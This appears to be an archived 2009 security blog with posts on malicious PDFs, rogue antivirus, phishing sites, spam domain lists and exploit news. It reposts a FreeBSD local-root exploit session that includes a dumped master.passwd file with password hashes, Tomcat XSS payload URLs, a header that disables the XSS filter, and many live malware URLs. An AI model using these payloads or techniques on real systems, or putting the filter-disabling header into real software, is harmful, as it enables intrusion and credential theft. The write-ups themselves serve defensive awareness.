Miekiesmoes named in malicious crafted PDF, with TrojanDropper:Win32/Microjoin.gen!B

While searching some malicious footprint code from Google that showed as below. Lots of the malicious sites can be found from below codes.



One of the malicious site is porn site "teensxtube.com", you will notices that following internet connections were established.

http://teensxtube.com/
http://teensxtube.com/wp.js
http://teensxtube.com/extra/sheduler.php
http://teensxtube.com/extra/count.php?gr=4
http://teensxtube.com/extra/count.php?gr=88
http://eccinput.com/rstat.htm
http://teensxtube.com/1.jpg
http://homesiteuk.com/index.php
http://eccinput.com/r/cnt-gif1x1.php?e=1600.1200&d=32&r=http%3A//teensxtube.com/&p=http%3A//eccinput.com/rstat.htm&t=
http://homesiteuk.com/x.x
http://homesiteuk.com//load.php?spl=mdac (VT 5/41); ThreatExpert Report
http://homesiteuk.com/index.php?spl=2&br=MSIE&vers=6.0&s=
http://homesiteuk.com//pdf.php
http://homesiteuk.com/index.php?spl=3&br=MSIE&vers=6.0&s=
http://saloongins.net/nop/tds2.php
http://autouploaders.net/mass/tds2.php
http://settopworld.net/incallspa.php
http://greatinstant.net/yourseekerz.php
http://getgreatguide.in/s/exx.php
http://promotds.com/in.cgi?16
http://promotds.com/in.cgi?6
http://trenublo.com/estplanete.php
http://getgreatguide.in/search.php?qq=young%20tight%20ass
http://teenbestmovie.com/pi.php
http://getgreatguide.in/s/exx.php
http://getgreatguide.in/search.php?qq=allure%20amateur%20paige
http://getgreatguide.in/search.php?qq=lesbian%20teen%20site%20myspace%20com
http://fuckthisteen.net/pi.php
http://teenbestmovie.com/index2.php
http://fuckthisteen.net/index2.php
http://bestwebtop.net/estvirtuel.php
http://getgreatguide.net/s/exx.php
http://www.unseencontent.com/
http://www.unseencontent.com/cgi-bin/atx/out.cgi?l=o
http://213.174.143.196/v/cj.php?d=80
http://topfuckmovies.net/
http://greattaby.com/addlinkworld.php
http://findyourlink.net/s/exx_new.php
http://findyourlink.net/search.php?qq=free%20gay%20guy%20sex%20video
http://fuckthisteen.net/out.php?t=3.0.2.178&url=http://www.campsnatch.com/hosted/index.php?ws/valik/teenybopperclub_mov500&s=2
http://cafebarplaza.cn/mostextra.php
http://tofindhomes.in/s/exx.php
http://tofindhomes.in/se.php?qq=hardcore%20big%20dick%20sex
http://settopworld.net/greattab.php
http://themiddel.com/s/exx.php
http://themiddel.com/search.php?qq=buy+soma+online
http://greatinstant.net/therealabc.php
http://themiddel.com/s/exx.php
http://themiddel.com/search.php?qq=buy+lipitor
http://trenublo.com/topext.php
http://findyourlink.net/s/exx_new.php
http://findyourlink.net/search.php?qq=cock%20first%20her%20massive
http://navigateguide.com/s/exx_new.php
http://navigateguide.com/search.php?qq=ebony%20free%20model%20pic%20woman
http://adprotraffic.com/asm.js?id=22592


http://homesiteuk.com//pdf.php, below is the decoded stream that captured from malicious pdf.

Seem like there have another layer code that need to decode. Without no surprising, you will get the actual codes after replacing "kru pop 32" with "%".


Obviously, analyst will get Unicode after decode using method UCS. http://homesiteuk.com//load.php?spl=pdf_0day

According to ThreatExpert, this malware categorized as Trojan Dropper and have Zbot characteristic. It will stole personal information and financial information. Besides that, it also generates lots traffics out to other porn websites.

Following generated connections:

autouploaders.net
saloongins.net
settopworld.net
greatinstant.net
trenublo.com
bestwebtop.net
greattaby.com
cafebarplaza.cn
discoverany.cn
d45648675.cn
moretds.in

From the malicious crafted pdf file, there have interesting that I noticed is about "/Author (Miekiemoes)"

Miekiesmoes is Assistant Director of Research @ Malwarebytes according from miekiemoes.blogspot.com



Seem like someone is joking with her! :-)

Security Tool Rouge Antivirus

Visiting compromised website with vulnerable IE browser end with rogue anti-virus installed in my virtual systems. As usual, rouge anti-virus will perform scanning on systems with alerting with fake messages, and end up users tricked to purchase rouge anti-virus online.



Will redirecting to "sodanthu.com/in6.php"









Few domains and IP address used to download the payloads:
sodanthu.com - 76.186.201.167
domoktov.com - 122.115.63.19
bodyscanfit.com - 95.143.192.197
93.178.16.243
67.8.103.165
115.23.132.150
72.189.62.203
remotepaybill.com - 72.233.65.202
58.180.228.103
noloid.com - 82.38.177.107

Basically there have two executable payload files downloaded with low that AV detection rate.
- load.exe 11/40 (sha1:f1b4fc1e56c9e129e83f3139b54dc9b26c481769) VT , ThreatExpert
- 78_wcap.exe 16/40 (sha1:a142cb266ad6cd764501981f6bb194025b7c8cc8) 78_wcap.exe VT, ThreatExpert

"load.exe" starting request to download another two payloads from following urls:
- http://95.211.8.217/pr/pic/test_vorogpa_b.exe (Netherlands)
- http://213.108.56.140/pr/pic/mode.exe (Russian Federation)

- test_vorogpa_b.exe 8/41 (sha1:77e476b0f93241d7fd4c96a93b2aaf51c0b7283c) VT, ThreatExpert
- mode.exe 8/41 (sha1:bd53d7a738a4eb7b208441772312c0a980f6c9d5) VT, ThreatExpert


Other than that, following Host Names were requested from host database:

93.178.16.243 Saudi Arabia
99.172.145.27 United States
70.136.99.45 United States
58.180.228.103 Korea, Republic Of
69.133.52.228 United States
98.150.16.40 United States
116.32.243.20 Korea, Republic Of
121.133.154.145 Korea, Republic Of
65.36.21.142 United States
67.8.103.165 United States
68.63.4.110 United States
115.23.132.150 Korea, Republic Of
211.212.234.198 Korea, Republic Of
189.39.157.223 Brazil
72.189.139.203 United States
200.59.9.82 Argentina
119.207.4.172 Korea, Republic Of
115.136.188.114 Korea, Republic Of
221.161.156.247 Korea, Republic Of
72.189.62.203 United States
152.1.90.107 United States
86.104.133.94 Romania
67.191.95.170 United States
112.170.209.51 Korea, Republic Of
189.41.94.209 Brazil
221.145.69.122 Korea, Republic Of
82.139.32.75 Poland
210.96.149.10 Korea, Republic Of
89.33.184.138 Romania
114.42.119.236 Taiwan, Province Of China
220.88.62.193 Korea, Republic Of
112.164.231.195 Korea, Republic Of
67.66.92.186 United States
192.35.222.23 United States
98.239.53.112 United States
211.56.233.178 Korea, Republic Of
98.204.223.239 United States
92.100.238.0 Russian Federation
162.105.113.88 China
121.182.163.238 Korea, Republic Of
200.79.216.225 Mexico
98.225.215.185 United States
67.160.46.239 United States
89.110.12.115 Russian Federation
98.224.160.221 United States
97.85.189.53 United States
76.237.5.121 United States
58.168.116.29 Australia
76.179.11.105 United States
70.126.56.149 United States
193.151.59.190 Ukraine
200.7.166.145 Bolivia
24.92.178.72 United States
88.216.25.114 Lithuania
99.232.235.89 Canada
115.43.186.103 Taiwan, Province Of China
118.42.212.181 Korea, Republic Of
121.185.21.213 Korea, Republic Of
121.174.84.123 Korea, Republic Of
68.69.204.104 Canada
61.58.111.158 Taiwan, Province Of China
94.54.195.12 Turkey
201.13.94.177 Brazil
121.145.43.209 Korea, Republic Of
188.97.120.80 Germany
80.216.136.246 Sweden
85.67.63.112 Hungary
70.235.17.227 United States
221.143.60.99 Korea, Republic Of
87.7.150.120 Italy
193.110.77.60 Ukraine
93.80.33.215 Russian Federation
67.49.12.244 United States
121.1.71.38 Korea, Republic Of
87.10.29.149 Italy
121.159.139.134 Korea, Republic Of
84.125.210.129 Spain
125.178.173.231 Korea, Republic Of
93.126.104.158 Ukraine
128.130.56.33 Austria
129.22.80.237 United States
220.116.89.236 Korea, Republic Of
24.42.76.57 United States
98.30.33.240 United States
84.3.94.38 Hungary
121.164.68.74 Korea, Republic Of
24.132.52.67 Netherlands
83.85.192.248 Netherlands
70.121.202.156 United States
64.246.85.154 United States
67.187.153.18 United States
98.240.224.97 United States
152.1.40.235 United States
79.9.35.42 Italy
69.204.254.166 United States
121.217.36.61 Australia
24.238.162.9 United States
121.128.195.90 Korea, Republic Of
109.60.245.57 Italy
119.64.109.187 Korea, Republic Of

World Of Warcraft Phishing Website

World of Warcraft (WoW) players should be on the lookout for phishing sites trying to get their user info.



Becareful for this link..

Malaysia Property Company Defaced, www.metrolink.com.my

My reader sent me email to post regarding the defacement for the Metrolink.com.my, this website providing full range of property at Malaysia include Sale, Rent, Project Development Launching and etc.

Before defaced:



After defaced:




Thanks for my reader!

Brittany Murphy's Death SEO Poisoning Among Security Vendors

Sudden death of Hollywood Celebrity's Brittany Murphy at age 32 during last weekend, really get bad guys interested to launch SEO poisoning at search result. This bad news really driving lots of users curiosity to become victim of scareware. Due to this incident, several articles regarding Brittany Murphy were posted by security vendors in their public blog.

Wensense - Brittany Murphy's Death SEO Poisoning
F-Secure - Brittany Murphy SEO
Trendmicro - News on Brittany Murphy’s Death Lead to FAKEAV
McAfee - Brittany Murphy Searching Dangers

Although whole worlds are in the Christmas mood, bad guys never stop to continue their making money nest. :)

Viagra & EuroSoft Promotion Spamming For Christmas

Spamming Links:

http://www.zhdfght.com/
http://www.piyamcy.cn
http://prettymoral.com
http://www.ingobdue.cn
http://nvaecs.angelfire.com
http://ienroller.angelfire.com
http://www.iwxkugue.cn
http://e10bee.suyivoqiw.cn/
http://biznews7.org/news
http://cid-a97391e298c94785.spaces.live.com
http://f2a63275.wejowafob.cn/
http://6a38a4.zehaqomay.cn/
http://97305a2a71.sudugefon.cn/
http://c301d1b3f9f7.vasesomer.cn/
http://30319b.bitapacoh.cn/
http://50386a9.rihogagox.cn/
http://cid-3e4630a031e273ff.spaces.live.com/
http://www.rxultimatespell.com/
http://f62db.xamobejep.cn/
http://moonnake.net/
http://11knife.ru/
http://001c2f.bapunat.cn/
http://1a68d3b7.hiyusev.cn/
http://now.to/5xt7
http://e5c8.cohuzkp.cn/
http://7e5629c7.jisurim.cn/
http://1680.cevupxn.cn/
http://bca.vocimtf.cn/
http://www.pharmlorens61.cn/
http://284c62d3.tabuhhh.cn/
http://dfe6.cetitgv.cn/
http://oskjcjed.cn/
http://89a.yomepmm.cn/
http://55a1.qofezgk.cn/
http://www.goziywb.cn/
http://fd78.yiruxgl.cn/
http://zokxfde.cn/
http://c3ceea7bf5.huweynf.cn/



http://kloperesofes.net/
http://sruisorehoes.net/
http://koperdinoses.com/
http://xirobenasoes.com/
http://ziopraventoes.com/
http://irgalometrices.com/

Fuckbook invitation in email

Just update, do you guys received tons of spam email regarding "FuckBook Invite #xxxxxx" ? I do received lots of similar messages.




Suspicious links:

http://nvaecs.angelfire.com
http://ienroller.angelfire.com
http://pcfreehost.tripod.com
http://ecbrowse.tripod.com
http://quickreviews.tripod.com
http://stupsihasi.tripod.com

Acrobat Zero Day - media.newPlayer(null) CVE-2009-4324

Since last week, Acrobat Zero-Day created lots attention to security industry and official vendor patch only available by next year 12 Jan 2010.

According to Net-Security, Adobe applications top the list of four applications identified in US NIST.

Metasploit Framework add this Zero Day exploit in their latest database.
http://downloads.securityfocus.com/vulnerabilities/exploits/adobe_media_newplayer.rb

Malicious PDF files crafted with this Zero-Day exploit are in wilds. So as usual, I recommend everyone to be more extra vigilant when receiving PDF files through internet.

Temporary solution for Adobe Reader either one
- Disable the "Disable JavaScript" features in your Adobe Reader.
- Edit registry (.reg) file

[HKEY_CLASSES_ROOT\AcroExch.Document.7]
"EditFlags"=hex:00,00,00,00

- Seek for alternative PDF reader that available in market.

Rogue Antivirus - Advanced Virus Remover & PC-Scanner2010.com

Browsing to link hxxxp://pc-scanner2010.com will prompt out scare message that trick users to download the rogue AntiVirus.





hxxxp://advanced-virusremover-2010.com


IP address: 193.104.110.50

advanced-virus-remover-2009.com
advanced-virusremover-2010.com
advanced-virusremover2009.com
avrdownnew5.com
avrdownnew6.com
avrdownnew7.com
avrdownnew8.com
avrdownnew9.com
buy-internet-security2010.com
buy-internetsecurity2010.com
downloadavr13.com
greatcrypt.com
mail.avrdownnew9.com
mail.buy-internet-security2010.com
mail.buy-internetsecurity2010.com
mail.masterhost.co.in
mail.pc-scanner-2011.biz
mail.pc-scanner-2012.net
mail.pc-scanner2010.com
masterhost.co.in
ns1.masterhost.co.in
pc-scanner-2011.biz
pc-scanner-2012.net
pc-scanner2010.com
vsproject.net
www.advanced-virus-remover-2009.com
xxx-white-tube.net

IP Address: 91.207.116.55

10-open-davinci.com
advancedvirus-remover-2010.com
advancedvirusremover-2009.com
best-scan-pc.biz
best-scan-pc.com
best-scan.com
best-scanpc.com
best-scanpc.net
best-scanpc.org
coolcount2.com
downloadavr6.com
downloadavr8.com
hard-xxx-tube.com
mail.10-open-davinci.com
mail.advanced-virus-remover-2009.com
mail.advanced-virus-remover2010.com
mail.advanced-virusremover-2010.com
mail.advanced-virusremover2009.com
mail.advancedvirus-remover-2010.com
mail.advancedvirusremover-2009.com
mail.best-scan-pc.com
mail.best-scan-pc.net
mail.best-scan.com
mail.best-scan.net
mail.best-scanpc.org
mail.cathrynzfunz.com
mail.coolcount1.com
mail.downloadavr6.com
mail.downloadavr7.com
mail.downloadavr8.com
mail.greatcrypt.com
mail.hard-xxx-tube.com
mail.testavrdown.com
mail.testavrdownnew.com
mail.vscodec-pro.net
mail.vsproject.net
mail.xxx-white-tube.net
mail.xxx-white-tube.org
testavrdownnew.com
vscodec-pro.net
white-xxx-tube.com
www.advancedvirus-remover2009.com
www.advancedvirusremover-2009.com
www.best-scan-pc.com
www.best-scanpc.net
www.best-scanpc.org
www.hard-xxx-tube.com
www.onlinescanxppro.com

FIESTA botnet dominance at Vietnam and India

Recently found one of the believed is FIESTA control panel kits showed the victims mainly from Vietnam and India, although the scale of infected systems small compare to other Zeus, Rustock and etc. Strongly believed that this control panel kits just tip of iceberg within "botnet" families.



From figure 1, I can make summarized that XP "SP1" are dominance of the victims systems compare to Vista, SP2, 2k and 2k3. There have not surprising that lots of internet users are using SP1 although SP2 and SP3 released few years ago.

Among the infected systems, Firefox browser lead among other browsers used to surf internet.



Figure 2 showed list of the possible"Luckysploits" exploits attempts on victims systems, consist of COM, MDAC, XML Parsing, Snapshot, WFI, PDF, VML2, FF behavior and NCT.

The downloaded executable file gain minor rate from Virustotal, and ThreatExpert reports can be review at http://www.threatexpert.com/report.aspx?md5=0095da1c241cb9056b67425dab3d7283

Rogue Antivirus- Internet Security 2010

Internet Security 2010 is another phony security software that look similar to legitimate security software.

Rogue software usually use scare tactics that trick users with false warnings and alert users to buy the product.



Installer "IS2010.exe"
File
MD5: 0x3199C032F173066DD0E9DB1E7D3C2F67
SHA-1: 0x761B2E2C291527196B920CFD29480422854CD523

File size: 1,414,656 bytes

http://www.threatexpert.com/report.aspx?md5=3199c032f173066dd0e9db1e7d3c2f67

Another rogue security software website that share same IP address with "Internet Security 2010"

Below is the screenshot that copy-exactly from the legitimate CleanMyPC Registry Cleaner.



The legitimate website is http://www.registry-cleaner.net/ with IP 66.39.16.135 . Be aware if the incorrect web link appear in browser address bar.

Phishing - Fake Facebook

Be caution when you login to the famous social networking portal "Facebook" like figure below, if you noticed the address bar carefully, actually it's a Facebook phishing site.

Figure 2 showed that the username and password used to login the Facebook. Several accounts were recorded in that fake "Facebook".

If you suspect your Facebook account was compromised, immediately change the password at the first place.

Figure1:


Figure2:


IP address:
66.45.237.212
69.10.48.106

Domains sharing same IP address:

05748.t35.com
3sbe.t35.com
accessonlineupdate.t35.com
angelsaddiavolo.t35.com
anggit.t35.com
azitromed.t35.com
banameex-sesion.t35.com
banamex-netkey.t35.com
barnamex.t35.com
bizboost.t35.com
bizbooster.t35.com
bl-lit.t35.com
btrl24.t35.com
demo.t35.com
devilzone.t35.com
dkz1.t35.com
falilat.t35.com
finivest.t35.com
freeware-ad.t35.com
friends09.t35.com
ghhghg.t35.com
jadult.t35.com
meetsaferbuds.t35.com
montagemfotos.t35.com
noriko.t35.com
ns2.t35.com
ogard.t35.com
oijvhalaocp.t35.com
punjat.t35.com
raghil.t35.com
realestateprofiles.t35.com
saadullah.t35.com
spyware-re.t35.com
texas-accountpoker.t35.com
vital.t35.com
wachovlogsinfoonline.t35.com
www.azitromed.t35.com

Close IE 8 Cross-Site Scripting (XSS) Filter

As aware that we has option to turn-off XSS filter functionality in IE 8 (client side), we also have option to turn-off XSS functionality at Server side by adding under Http Header.

PHP:
header("x-xss-Protection:0");

ASP.net.config:


reference: http://msdn.microsoft.com/zh-cn/library/dd565647(en-us,VS.85).aspx

FreeBSD local r00t zeroday

Reference source: http://seclists.org/fulldisclosure/2009/Nov/371

** FreeBSD local r00t 0day

Discovered & Exploited by Nikolaos Rangos also known as Kingcope.

Nov 2009 "BiG TiME"

"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievable simple local r00t bug in recent FreeBSD versions.

I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.

The bug resides in the Run-Time Link-Editor (rtld).

Normally rtld does not allow dangerous environment variables like LD_PRELOAD

to be set when executing setugid binaries like "ping" or "su".

With a rather simple technique rtld can be tricked into

accepting LD variables even on setugid binaries.

See the attached exploit for details.

Example exploiting session

**********************************

%uname -a;id;

FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21

15:48:17 UTC 2009

root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386

uid=1001(kcope) gid=1001(users) groups=1001(users)

%./w00t.sh

FreeBSD local r00t zeroday

by Kingcope

November 2009

env.c: In function 'main':

env.c:5: warning: incompatible implicit declaration of built-in

function 'malloc'

env.c:9: warning: incompatible implicit declaration of built-in

function 'strcpy'

env.c:11: warning: incompatible implicit declaration of built-in

function 'execl'

/libexec/ld-elf.so.1: environment corrupt; missing value for

/libexec/ld-elf.so.1: environment corrupt; missing value for

/libexec/ld-elf.so.1: environment corrupt; missing value for

/libexec/ld-elf.so.1: environment corrupt; missing value for

/libexec/ld-elf.so.1: environment corrupt; missing value for

/libexec/ld-elf.so.1: environment corrupt; missing value for

ALEX-ALEX

# uname -a;id;

FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21

15:48:17 UTC 2009

root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386

uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)

# cat /etc/master.passwd

# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29

kensmith Exp $

#

root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh

toor:*:0:0::0:0:Bourne-again Superuser:/root:

daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin

operator:*:2:5::0:0:System &:/:/usr/sbin/nologin

bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin

tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin

kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin

games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin

news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin

man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin

sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin

smmsp:*:25:25::0:0:Sendmail Submission

User:/var/spool/clientmqueue:/usr/sbin/nologin

mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin

bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin

proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin

_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin

_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin

uucp:*:66:66::0:0:UUCP

pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico

pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin

www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin

nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin

kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User

&:/home/kcope:/bin/sh

#

Systems tested/affected

**********************************

FreeBSD 8.0-RELEASE *** VULNERABLE

FreeBSD 7.1-RELEASE *** VULNERABLE

FreeBSD 6.3-RELEASE *** NOT VULN

FreeBSD 4.9-RELEASE *** NOT VULN

*EXPLOIT*

http://seclists.org/fulldisclosure/2009/Nov/371

Spam **05-Dec

IP Address: 82.204.219.218

*.live.smtp.ru

*.michael.smtp.ru

*.msn.live.smtp.ru

*.my-yahoo-register.smtp.ru

*.ndgcx2zh2.smtp.ru

*.olhardigital.smtp.ru

*.smtp.ru

*.system.smtp.ru

*.uk.smtp.ru

*.working.smtp.ru

2a.smtp.ru

accedipostaitalienesslttpacceso.smtp.ru

altenativo2010.smtp.ru

anjodoamor2007.smtp.ru

beatrisadoyy.smtp.ru

blog-fotos-amanda.smtp.ru

blogger1.smtp.ru

cap1.smtp.ru

cocoleg.smtp.ru

computing.system.smtp.ru

finasa.smtp.ru

ftp2.smtp.ru

hsbc.uk.smtp.ru

hussein.working.smtp.ru

kalamazu2008.smtp.ru

lembrancas.michael.smtp.ru

live.smtp.ru

michael.smtp.ru

mikle.smtp.ru

msgss.smtp.ru

msn.live.smtp.ru

my-yahoo-register.smtp.ru

ndgcx2zh2.smtp.ru

node2.mk.pochta.ru

olhardigital.smtp.ru

pozesursa1.smtp.ru

ssl1.smtp.ru

system.smtp.ru

testing.smtp.ru

uk.smtp.ru

vida.smtp.ru

working.smtp.ru

www.altenativo2010.smtp.ru

www.blog-fotos-amanda.smtp.ru

www.finasa.smtp.ru

www.hsbc.uk.smtp.ru

www.msn.live.smtp.ru

www.my-yahoo-register.smtp.ru

www.ndgcx2zh2.smtp.ru

www.olhardigital.smtp.ru

IP Address: 64.62.181.43

*.fileave.com

2a.fileave.com

badkiddies.fileave.com

bandaeva.fileave.com

binuser.fileave.com

camimura.fileave.com

casinhabranca.fileave.com

contempt.fileave.com

ericschevy.fileave.com

finkel.fileave.com

googlevideo.fileave.com

gtemplates.fileave.com

ovhsux.fileave.com

scn2.fileave.com

tikam.fileave.com

trustha.fileave.com

vembebe.fileave.com

xscan.fileave.com

zenka.fileave.com

zzzz.fileave.com

IP Address: 217.116.46.139

*.auszer.hu

*.egylap.hu

*.mail.webmester.net

*.webmester.net

auszer.hu

auto-tuning.hu

boltmix.com

csofek.hu

duoeotvos.com

egylap.hu

hirdet.info

hirdet.net

kezdo.net

kontaktspray.com

kontaktspray.hu

kpeg.hu

lakeinvest.hu

mail.auszer.hu

mail.auto-tuning.hu

mail.csofek.hu

mail.egylap.hu

mail.kemence.net

mail.kpeg.hu

mail.nevjegytar.hu

mail.oxalis.hu

mail.relaxinfra.hu

mail.rudasy.hu

mail.vicc.net

mail.webmester.net

motobatt.info

motor-akku.hu

nevjegytar.hu

ns2.webmester.net

ns3.webmester.net

oxalis.hu

proelektro.info

relaxinfra.hu

root.mail.webmester.net

root.webmester.net

rudasy.hu

tokol.net

tokoliuszoda.hu

vicc.net

webmester.net

wiha.info

www.vicc.net

www.webmester.net

IP Address: 218.93.205.19

*.guarddog2009.com

brans.pl

dl.guarddog2009.com

guarddog2009.com

root.guarddog2009.com

www.brans.pl

www.guarddog2009.com

www.zief.pl

zief.pl

Apache Tomcat 404 error Vulnerability

Reference: http://websecurity.com.ua/3114

Vulnerable:

Apache Software Foundation Tomcat 3.2.1

Apache Software Foundation Tomcat 3.2

Apache Software Foundation Tomcat 3.1.1

Apache Software Foundation Tomcat 3.1

Apache Software Foundation Tomcat 3.0

Exploit:

http://www.example.com/?offset=1&cid=1&limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/?offset=1&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/?offset=%3Cscript%3Ealert(document.cookie)%3C/script%3E&cid=1

Reference: http://websecurity.com.ua/3114